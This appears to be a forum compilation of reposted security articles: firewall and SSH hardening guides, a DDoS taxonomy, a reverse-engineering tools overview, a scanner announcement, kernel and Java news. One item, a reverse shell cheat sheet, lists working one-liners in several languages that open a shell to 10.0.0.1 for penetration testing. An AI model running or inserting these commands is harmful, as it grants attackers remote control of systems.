/etc/apf/conf.apf Change: * RAB="0" to RAB="1" * RAB_PSCAN_LEVEL="2" to RAB_PSCAN_LEVEL="3" * TCR_PASS="1" to TCR_PASS="0" * DLIST_PHP="0" to DLIST_PHP="1" * DLIST_SPAMHAUS="0" to DLIST_SPAMHAUS="1" * DLIST_DSHIELD="0" to DLIST_DSHIELD="1" * DLIST_RESERVED="0" to DLIST_RESERVED="1" Step 3.1: Find IFACE_IN= and IFACE_OUT= in /etc/apf/conf.apf and verify that they match your network interface Step 3.2: Locate HELPER_SSH_PORT=”22? and change it to your SSH port IF you changed it in your sshd_config: Step 3.3: Locate IG_TCP_CPORTS=”22? and change it to your SSH port IF you changed it in your sshd_config: REMEMBER MAKE SURE YOU TO CHANGE YOUR SSHD PORT IN APF, IF YOU CHANGED IT IN SSHD_CONFIG You can run this command “cat /etc/ssh/sshd_config |grep Port” to see what port your SSHD uses Step 4: Restart the APF /usr/local/sbin/apf -r Step 5: Now relogin though ssh again, to verify that you still can login into your server Step 6: When your happy with your firewall and everything works fine, Edit /apf.conf find DEVEL_MODE=”1? and change it to DEVEL_MODE=”0? Step 7: Restart APF again /usr/local/sbin/apf -r Step 8: Make sure APF starts automatic after restart chkconfig --add apf chkconfig --level 345 apf on You should NOW have a firewall up and running! Enjoy Port setting example for different Hosting control panels: Directadmin: IG_TCP_CPORTS=”21,22,25,53,80,110,111,143,443,587,953,2222,3306,32769? IG_UDP_CPORTS=”53,111,631,724,5353,32768,32809? EGF=”1? EG_TCP_CPORTS=”21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089? EG_UDP_CPORTS=”20,21,37,53,873? Cpanel: IG_TCP_CPORTS=”20,21,22,25,26,53,80,110,143,443,465,993,995,2082,2083,2086,2087,2095,2096? IG_UDP_CPORTS=”21,53,873? EGF=”1? EG_TCP_CPORTS=”21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089? EG_UDP_CPORTS=”20,21,37,53,873? Troubleshooting: Problem: If you get this error apf(xxxxx): {glob} unable to load iptables module (ip_tables), aborting. Solution: Try changing SET_MONOKERN=”0? to SET_MONOKERN=”1? , then apf -r Problem: If you get this message: apf(xxxxx): {glob} !!DEVELOPMENT MODE ENABLED!! – firewall will flush every 5 minutes. Solution: you need to change DEVEL_MODE=1 to DEVEL_MODE=0, make sure your config is working first. Sursa: Install Firewall | SecureCentos.com

Hardening SSHD Step 1: First of all we need to make a regular user, since we are disabling direct root login: adduser admin && passwd admin Step 2: Backup your current sshd_config mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak Step 3: Create a new sshd_config file nano -w /etc/ssh/sshd_config Step 3.1: Paste this code into the new file ## Change to other port is recommended, etc 2488 Port 22 ## Sets listening address on server. default=0.0.0.0 #ListenAddress 192.168.0.1 ## Enforcing SSH Protocol 2 only Protocol 2 ## Disable direct root login, with no you need to login with admin user, then "su -" you into root PermitRootLogin no ## UsePrivilegeSeparation yes ## AllowTcpForwarding no ## Disables X11Forwarding X11Forwarding no ## Checks users on their home directority and rhosts, that they arent world-writable StrictModes yes ## The option IgnoreRhosts specifies whether rhosts or shosts files should not be used in authentication IgnoreRhosts yes ## HostbasedAuthentication no ## RhostsAuthentication specifies whether sshd can try to use rhosts based authentication. RhostsRSAAuthentication no ## Adds a login banner that the user can see Banner /etc/motd ## Enable / Disable sftp server #Subsystem sftp /usr/libexec/openssh/sftp-server ## Add users that are allowed to log in AllowUsers admin Control + X to save Step 4: Verify settings in the sshd_config you created nano -w /etc/ssh/sshd_config REMEMBER YOU SHOULD CHANGE THE PORT TO SOMETHING ELSE. ( Example Port 2488 ) Step 5.1: Add text to MOTD Banner file (/etc/motd) nano -w /etc/motd Step 5.2: Add this text, or something else of your choice Private system, please log off. Step 6: Restart the SSHD Daemon service sshd restart Step 7: Start a NEW client, and test that you can connect on new port. (DO NOT CLOSE CURRENT SSH CLIENT INCASE OF PROBLEMS) Sursa: Hardening SSHD | SecureCentos.com

Taxonomy of DDoS Attacks Property of RioRey, Inc. © 2009 - 2011 1. SYN Flood. Clients generate a SYN packet (64 bytes) to request a new session from a host server. As the TCP three-way communication handshake is created, the host will track and allocate each of the client’s sessions until the session is closed. In a SYN flood, a victim server receives spoofed SYN requests at a high packet rate that contain fake source IP addresses. The SYN flood overwhelms the victim server by depleting its system resources (connection table memory) normally used to store and process these incoming packets, resulting in performance degradation or a complete server shutdown. A well-crafted SYN flood often fools deep-packet inspection filtering techniques. SYN-Cookie defense can be used to defend against large-scale SYN floods but this requires all servers to support this capability. 2. SYN-ACK Flood. Host servers generate SYN-ACK packets in response to incoming SYN requests from clients. During a SYN-ACK flood, the victim server receives spoofed SYN-ACK packets at a high packet rate. This flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to compute this irregularity, resulting in performance degradation or a complete server shutdown. 3. ACK & PUSH ACK Flood. After a TCP-SYN session is established between a host and a client, ACK or PUSH ACK packets are used to communicate information back and forth between the two until the session is closed. During an ACK flood, a victim receives spoofed ACK packets at a high packet rate that fail to belong to any session within the server’s connection list. The ACK flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to match these incoming packets, resulting in performance degradation or a complete server shutdown. ........................................................................................ Download: http://www.riorey.com/x-resources/2011/RioRey_Taxonomy_DDoS_Attacks_2.2_2011.pdf

Introduction to Malware & Malware Analysis by Rajesh Nikam Introduction Reverse engineering is the process of analyzing a subject system to identify the system's components and their relationships, and to create representations of the system in another form or at a higher level of abstraction. The process of reverse engineering, which is part of malware analysis, is accomplished using specific tools that are categorized as hex editors, disassemblers/debuggers, decompiles and monitoring tools. Disassemblers/debuggers occupy important position in the list of reverse engineering tools. A disassembler converts binary code into assembly code. Disassemblers also extract strings, used libraries, and imported and exported functions. Debuggers expand the functionality of disassemblers by supporting the viewing of the stack, the CPU registers, and the hex dumping of the program as it executes. Debuggers allow breakpoints to be set and the assembly code to be edited at runtime. One must be familiar with the Portable Executable (PE)[1]file format before diving into reverse engineering for Windows executables. In this article we will get into important aspects of Hiew, OllyDbg and IDA Pro from reverse engineer's perspective. Hiew Hiew[2] short for Hacker's view is a great disassembler (not that this is not debugger) designed for hackers, asthe name suggests. It supports three modes - Text, Hexadecimal and Decode (Dis-assembly) mode. Enter/F4 key is used to switch between these modes. In each mode the Function Line, corresponding to function keys from F1 to F12, which appears at the bottom of the Hiew screen, changes and its functionality with CTRL, SHIFT and ALT combinations. PE Header PE Header could be viewed by pressing F8 from Hex or Decode view. In this mode we could see important properties of PE file using following shortcuts: F6 Sections Table F7 Import Table F9 Export Table F10 Data Directories F5 Jump to Entry Point Alt-F2 Jump to end of last section Search in file Hiew supports to search in a file for ASCII or HEX sequence of bytes by pressing F7 key. It also supports byte wild character. Alt-? Wild character Shift-F7 To repeat search Alt-F7 To change search direction Strings ASCII and Unicode strings are viewed from Text/Hex mode by pressing Alt-F6 key. This helps to search for juicy strings like suspicious urls, FTP, SMTP or IRC commands, files names, registry keys etc in the file. You could jump to selected string from string window by pressing ENTER key. +/- keys are used to change the minimum length of displayed strings, this will help to filter out smaller strings. You could apply filter for displayed strings using F9 key. Moving around You could directly jump to specific location by pressing F5 key and providing offset (offset values are hexadecimal?). To specify relative offset + or - sign could be used as prefix to offset. When specified offset is a Virtual Address, it should start with ".". Alt-F1 key is used to toggle between Virtual Address and file offset. If you want jump to specific function or offset which appears as part of control transfer instruction like call, jmp or conditional jump, you could press the key that appears at the end of instruction. Please see Fig.1 marked for label 4. In this case if you press key “4”, it will take you to offset 0x010073DA. 0 or Backspace key is used to jump back the previous instruction. Simple Decryption Hiew supports decryption of block using simple encryptions like xor, add, rol etc. Press F3 from Hex or Decode view to enter in edit mode and then press F7 to add simple decryption routine. You could set operand size as byte, word or dword by pressing F2. Hiew works great when used in combination with File Manager like FAR[3] by configuring its command line. This is very helpful disassembler to quickly get different aspects of file under analysis like file header, section information, data directories, imported / exported functions and strings. OllyDbg OllyDbg[4][5]is an application-level debugger. OllyDbg interface shows the disassembly, hex dump, stack, and CPU registers. Additionally, OllyDbg supports run tracing, conditional breakpoints, PE header viewing, hex editing, and plug-in support. At first Startup, OllyDbg asks to setup User Data Directory (UDD) and Plugins directory.UDD is used to keep debugged application specific information like breakpoints and other information and obviously you need to save plugins in Plugins directory. It provides wide Debugging Options like break on new module or when thread is created, how to process exceptions etc. OllyDbg supports setting of Hardware Breakpoints, Software Breakpoints, Memory Breakpoints and even Conditional Breakpoints. OllyDbg supports plugins to enhance its functionality. Olly Advanced Plugin There were some bugs reported with Olly v1.10 related to string parsing routine, parsing of faulty executables. This plugin fixes most of these bugs. Some malware samples are loaded with Anti-Debugging techniques [7], Olly Advanced plugin helps to counter most of them. Olly DumpPlugin Olly Dump is used to dump debugged process memory. You could trace the packed file till it reaches original entry point and then dump unpacked version of file from process memory. It provides options to rebuild Import Address Table (IAT). Olly ScriptPlugin OllyScriptis a plugin to that lets you to automate OllyDbg by writing scripts in an assembly-like language. Many tasks involve a lot of repetitive work just to get to some point in the debugged application. By using this plugin you could write a script once and it could be used with other similar samples. OpenRCE[8]hosts dozens of scripts that helpful to find original entry point (OEP) of many packers. IDA Pro IDA Pro is a powerful disassembler that presents the disassembly in well-organized format, shows Graph view of selected function. However, it is less frequently used as a debugger in reverse engineers community where OllyDbg steals the top rank. IDA Pro's features include hex editing, string extraction, and import and export viewing. IDA Pro also features a window for viewing all of the functions called by a program, and provides accurate analyses of the program, summarizing them in a color-coded bar at the top of the screen, which classifies the various sections of the program's code. Below figure shows IDA Pro's interface, including the disassembly and the color-coded analysis bar at the top of the screen. The titles of the other windows are visible on the tabs above the disassembly. IDA Pro supports wide variety of processors like ARM, DEC, Intel, Motorola etc. IDA Pro provides selection of debuggers • Bochs • Win Debugger • GDB • WinDbg IDA Pro with Boch semulator make an interesting combination that is used to debug Operating system starting from booting process and it is helpful in debugging even ROM BIOS and Master Boot Record code. Analysis done on particular sample, comments added, functions marked could be saved as an .idb file. IDA Shortcuts Below is the list of some important IDA Shortcuts, for complete list please visit reference [9]. Enter Goto address or variable Esc Go back to previous location ; Add inline comment INSERT | SHIFT ; Add comment N Rename label, variable, functions etc. X Show cross reference M Substitute enum CTRL W *Dont forget to* Save changes Extending IDA IDA supports writing IDC Scripts which is very similar to C like language on top of powerful IDA disassembler. The functionality of disassembler could be utilized even through python scripts and by writing plugins. FLIRT Fast Library Identification and Recognition Technology One of the challenges with disassembly of programs developed with modern high level languages is to identify library functions. One may end up in spending considerable time to go through these functions. On the other hand identification of library functions can considerably ease the analysis of a program. IDA comes with FLIRT to recognize the standard library functions. One must understand the power of each tool to choose appropriate tool for specific requirement during reverse engineering. References 1. Portable Executable File Format – A Reverse Engineer View Tuts 4 You: Downloads / Portable Executable Format (PE) / Portable Executable File Format 2. Hiew Hiew homepage 3. FAR Manager Far Manager Official Site : main 4. OllyDbg OllyDbg v1.10 5. OllyDbg Quick Start Guide Tuts 4 You: Downloads / OllyDbg Tutorials / OllyDbg Quick Start Guide 6. OllyDbg Plugins OpenRCE 7. Anti-Debugging http://lilxam.free.fr/repo/hacking/Windows%20Anti-Debug%20Reference.pdf 8. Olly Scripts OpenRCE 9. IDA Shortcuts http://www.hex-rays.com/idapro/freefiles/IDA_Pro_Shortcuts.pdf Sursa: Tools for Reverse Engineering and Malware Analysis | ClubHACK Magazine

Hijacking Facebook Fan Pages It's easier to hijack a Facebook page than you would expect, because of sloppy security from the social network. The question is - will Facebook do anything about it? Video: http://www.securitytube.net/video/2210 Cu alte cuvinte: daca esti administrator pe o pagina, poti scoate ceilalti administratori, administratorii "originali".

Java 7 Officially Released Published: 2011-09-05, Last Updated: 2011-09-05 13:44:59 UTC by Raul Siles (Version: 2) Oracle officially released Java 7, including some security updates and several new features and enhancements. Thanks ISC reader Alex for notifying us about it. The new Java 7 version coexists with the latest Java 6 Update 27 version and is available for download from the Oracle web site, Oracle Technology Network for Java Developers, and still makes use of different installers for the 32 and 64-bit versions for all operating systems (Linux, Solaris & Windows). As you can see in the release notes, the main security enhancements affect the JSSE (Java Secure Socket Extension) and TLS communications, including TLS v1.1 and v1.2 as well as Server Name Indication (SNI) support. Java 7 does not remove any previous Java versions; I guess this is the intended behavior as this is a major release. From a security perspective, if Java 7 is installed (using Windows as the sample platform) on a system that already has Java 6 installed, both versions will remain, so if you only want to run the latest version, ensure you uninstall any previous versions (as we had to do in the past but with the same major release) and do not leave vulnerable Java 6 releases around. Considering Java is one of the most targeted pieces of client software today, be ready for future updates on both, Java 6 and Java 7 in your IT environments (perhaps Java 6u28 and Java 7u1), and plan in advance how to manage them. UPDATE 1: Let's clarify this diary post title a little bit based on txISO comment (thanks!). If you consider Java to be officially released only when it is available at java.com, then Java has not been officially released yet (see quote on 3rd comment below). However, if you consider that Java 7 is available out there, not only in its JDK version (what I consider the version for developers), but the JRE (Java Runtime Environment) version too, then IMHO, it has been released - although only at oracle.com. Besides that, if you are old Java school and go to the old java.sun.com, you will be redirected to the oracle.com page where Java 7 is available to the public. For our ISC audience, officially or not, get ready for Java 7 as soon as possible: it is out there Sursa: ISC Diary | Java 7 Officially Released

skipfish A fully automated, active web application security reconnaissance tool. Key features: High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion. Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors. The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments. Docs: SkipfishDoc - skipfish - Project documentation - web application security scanner - Google Project Hosting Primer: lcamtuf's blog: Understanding and using skipfish Download: http://skipfish.googlecode.com/files/skipfish-2.03b.tgz Sursa: skipfish - web application security scanner - Google Project Hosting

Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”. Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable. Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL Here’s a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6… php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' If you want a .php file to upload, see the more featureful and robust php-reverse-shell. Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. nc -e /bin/sh 10.0.0.1 1234 If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f xterm One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): xhost +targetip Sursa: Reverse Shell Cheat Sheet | pentestmonkey

OSSEC is an Open Source Host-based Intrusion Detection OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX and Windows. A list with all supported platforms is available here. Docs: Documentation Download: http://www.ossec.net/main/downloads

Linux Kernel Moves To Github From Linus Torvalds <> Date Sun, 4 Sep 2011 16:27:25 -0700 Subject Linux 3.1-rc5 So it's been another week, and it's time for another -rc. However, master.kernel.org is still down, and there really hasn't been a ton of development going on, so I considered just skipping a week. But hey, the whole point (well, *one* of the points) of distributed development is that no single place is really any different from any other, so since I did a github account for my divelog thing, why not see how well it holds up to me just putting my whole kernel repo there too? So while kernel.org is down for the count, let's just see how github does: https://github.com/torvalds/linux.git NOTE! One thing to look out for when you see a new random public hosting place usage like that is to verify that yes, it's really the person you think it is. So is it? You can take a few different approaches: (a) Heck, it's open source, I don't care who I pull from, I just want a new kernel, and not having a new update from kernel.org in the last few days, I *really* need my new kernel fix. I'll take it, because I need to exercise my CPU's by building randconfig kernels. Besides, I like living dangerously. ( Yeah, the email looks like it comes from Linus, and we all know that SMTP cannot possibly be spoofed, so it must be him. © Ok, I can fetch that tree, and I know that Linus always does signed tags, and I can verify the 3.1-rc5 tag with Linus known public GPG key that I have somewhere. If it matches, I don't care who the person doing the release announcement is, I'll trust that Linus signed the tree (d) I'll just wait for kernel.org to feel better. Whatever works for you. One thing to note: If you just do git pull https://github.com/torvalds/linux.git you probably won't get the tags, since it's not your origin branch. So do git fetch --tags <...> too, so that you get not only the actual changes, but the tag that you can verify too. And I *would* suggest you just pull into an existing tree, rather than clone a new copy. I bet the github people will appreciate that. Anything worth saying about the changes themselves? The appended shortlog pretty much speaks for itself: there really hasn't been much excitement on the kernel development front. Now, if you want to talk to me about dive logging software, that's a whole different kettle of fish.. Linus Sursa: Linux Kernel Moves To Github - Slashdot Info: https://lkml.org/lkml/2011/9/4/92

Window shopping goes high tech with gesture recognition The Fraunhofer Institute's interactive shop window lets people use gestures to learn more about products on display German researchers have given a new meaning to window shopping. At the IFA consumer electronics show in Berlin the Fraunhofer Heinrich Hertz Institute showed a prototype that lets shoppers learn more about what's in a store display window when the store is closed. Called the Interactive Shop Window the system consists of a flat screen monitor and a motion tracker positioned behind the glass of a store's front window. When window-shoppers stand in front of the window, they can point at a product they want. Then the display box holding the product will light up and information for the object will be shown on the screen. Window-shoppers can then view it in different colors or sizes, or learn more about it. The system is controlled by the window-shopper's gestures, which are captured using motion tracking technology that the Fraunhofer team has been working on for a decade. The institute is looking for partners to further the technology and one day change the look of department store windows. "We're searching for partners in the industry to bring it as a new product," said Paul Chojacki, in charge of interactive media for the Fraunhofer Heinrich Hertz Institute. "We have some bigger companies in Germany who are interested in this," he said, although he didn't say which ones. Before the system is ready for a commercial debut there are still some bugs that need to be worked out. For example, the pointer will sometimes jump around the screen, or something will be selected that wasn't intended. Chojacki said one of the biggest challenges was making sure the motion tracking system filtered out reflections on the store front glass. "The window is a problem for us because it's reflecting light and pictures," he said. "We found a solution that is working very well right now." Another problem for the team will be teaching passers by how to use the system because it isn't all that intuitive. Users have to stand in exactly the right spot and make gestures in a defined area for the motion tracker to see them. Chojacki said that the Fraunhofer motion tracker could be replaced by a Microsoft Kinect sensor, but that theirs is specially tailored for the project. Fraunhofer has been working on its motion tracker well before the Kinect premiered, and has shown it at previous IFA shows. In 2008 it was used in the iPointPresenter project, which allowed users to control a mouse cursor using gestures. At the time it could only track objects on a 2D plane. In 2009 the team upgraded the system for the iPoint3D project that recognized gestures on the X, Y and Z axes. Chojacki was also involved with iPoint3D. Sursa si video: Window shopping goes high tech with gesture recognition - webcams, retail, popular science, peripherals, monitors, Input devices, industry verticals, IFA, Fraunhofer Heinrich Hertz Institute - Techworld

Cosmos - C# Open Source Managed Operating System Welcome to the Cosmos home page. Cosmos is an operating system project implemented completely in CIL compliant languages. The team is committed to using C#, however any .NET language can be used. Latest News Aug 3, 2010 - MS5 is here! Why Cosmos? Because its fun! Do we need any more reasons? Well if you do, here are a list of many real world scenarios we envision. How does Cosmos work? Cosmos includes a compiler (IL2CPU, which is part of Cosmos) that reads the input file (usually the shell) and Cosmos libraries and compiles the resulting IL to x86 code. IL2CPU has a layer for cross platform and we plan to support other processors and platforms, including x64. IL2CPU also supports certain extension methods which allow C# code to interact directly with the CPU, registers, and ports in the kernel. IL2CPU contains some inline assembler, but there are no ASM files that need to be linked in. Currently IL2CPU first outputs raw asm files (with IL comments) and then processes them through nasm (a free assembler). Later we plan to emit directly to binary. For more information with pretty pictures please read this article at CodeProject. Sursa: Cosmos - Cosmos Getting started: Getting Started - Cosmos

Buffer overflows - au aparut acum 20 de ani. Nu mai au actualitate?